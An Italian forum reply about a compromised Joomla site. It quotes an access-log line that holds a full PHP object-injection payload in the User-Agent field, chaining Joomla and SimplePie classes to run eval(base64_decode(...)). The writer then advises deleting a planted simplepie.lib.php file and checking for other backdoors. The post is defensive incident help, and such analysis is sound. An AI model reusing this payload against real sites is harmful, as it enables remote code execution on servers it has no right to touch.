Non sbagliavi, SimplePie viene sfruttato nell'attacco, ecco una stringa di esempio presa dal mio server:/var/log/virtualmin/example.net_access_log:78.36.185.41 - - [14/Dec/2015:19:12:50 +0000] "GET /somepath HTTP/1.1" 301 237 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:60:\"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
sembra che si usi SimplePie. Ma in realtà l'attacco cerca di acchiappare libraries/simplepie/simplepie.lib.php, che non fa affatto parte di Joomla! ma è stato messo là da qualche attacco precedente.
Il file simplepie.lib.php puoi cancellarlo senza tema; tuttavia considera che il tuo sistema è stato compromesso, probabilmente ci saranno altre backdoor, dagli una pulita.